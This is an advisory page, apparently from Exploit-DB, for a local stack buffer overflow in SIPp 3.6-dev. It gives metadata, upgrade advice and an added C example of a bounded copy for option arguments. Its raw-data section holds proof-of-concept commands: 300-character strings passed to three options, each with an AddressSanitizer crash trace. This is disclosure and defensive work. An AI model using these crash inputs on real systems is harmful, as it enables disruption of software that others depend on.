Vendor: SIPp
By: Fakhri Zulkifli
CVSS: 7.8 (HIGH)
CWE: 120 (Buffer Overflow)
Product Name: SIPp
Affected Version From: 3.6-dev
Affected Version To: 3.6-dev
Patch Exists: YES
Related CWE: N/A
CPE: a:sipp:sipp
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: 3.6-dev
2018

SIPp 3.6 – Local Buffer Overflow (PoC)

A buffer overflow vulnerability exists in SIPp 3.6-dev and earlier versions. By passing a large string of "A" characters (300 in the PoC below) as the argument to the -3pcc, -i, or -log_file option, a local attacker can cause a stack-based buffer overflow, resulting in a crash. The AddressSanitizer traces below place each overflow in a strcpy call made from main in src/sipp.cpp.

Mitigation:

Upgrade to the latest version of SIPp.
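
For builds that cannot be upgraded immediately, the bug class shown in the traces below (an option argument copied with strcpy in main) is closed by a length-checked copy that rejects oversized input. The following is an added example, not SIPp's code or its actual patch; the buffer size, struct fields and function names are assumptions.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define OPT_BUF_LEN 128 /* assumed size; the page does not give SIPp's real buffer sizes */

struct opts {                     /* hypothetical destinations for the three options */
    char local_ip[OPT_BUF_LEN];   /* -i */
    char twin_addr[OPT_BUF_LEN];  /* -3pcc */
    char log_file[OPT_BUF_LEN];   /* -log_file */
};

/* Bounded replacement for strcpy(dst, argv[i]).
 * Returns 0 on success, -1 with errno set when src (plus its NUL) does not fit.
 * It rejects instead of truncating: a silently shortened address or log path
 * would be a different bug. On failure dst is left as an empty string. */
static int copy_opt_arg(char *dst, size_t dst_len, const char *src)
{
    if (!dst || !src || dst_len == 0) { errno = EINVAL; return -1; }
    /* memchr stops at the first NUL, so it never reads past the end of src. */
    const char *nul = memchr(src, '\0', dst_len);
    if (!nul) { dst[0] = '\0'; errno = ENAMETOOLONG; return -1; }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Constructed option loop covering only the three options named in the advisory. */
static int parse_opts(int argc, char **argv, struct opts *o)
{
    for (int i = 1; i < argc; i++) {
        const char *name = argv[i];
        char *dst;
        if (strcmp(name, "-i") == 0) dst = o->local_ip;
        else if (strcmp(name, "-3pcc") == 0) dst = o->twin_addr;
        else if (strcmp(name, "-log_file") == 0) dst = o->log_file;
        else continue;
        if (++i >= argc) { fprintf(stderr, "%s: missing argument\n", name); return -1; }
        if (copy_opt_arg(dst, OPT_BUF_LEN, argv[i]) != 0) {
            fprintf(stderr, "%s: argument exceeds %d bytes, rejected\n", name, OPT_BUF_LEN - 1);
            return -1;
        }
    }
    return 0;
}

int main(int argc, char **argv)
{
    struct opts o = {0};
    return parse_opts(argc, argv, &o) == 0 ? 0 : 1;
}
```

Compiling the real binary with -fsanitize=address, as the author did, and rerunning the three invocations is a quick regression check after any fix.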

Exploit-DB raw data:

# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC)
# Date: 2018-06-30
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: http://sipp.sourceforge.net/ 
# Software Link: https://github.com/SIPp/sipp/releases 
# Version: 3.6-dev and earlier
# Tested on: 3.6-dev

$ ./sipp -3pcc `python -c 'print("A" * 300)'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17
#2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -i `python -c 'print("A" * 300)'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17
#2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -log_file `python -c 'print("A" * 300)'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17
#2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)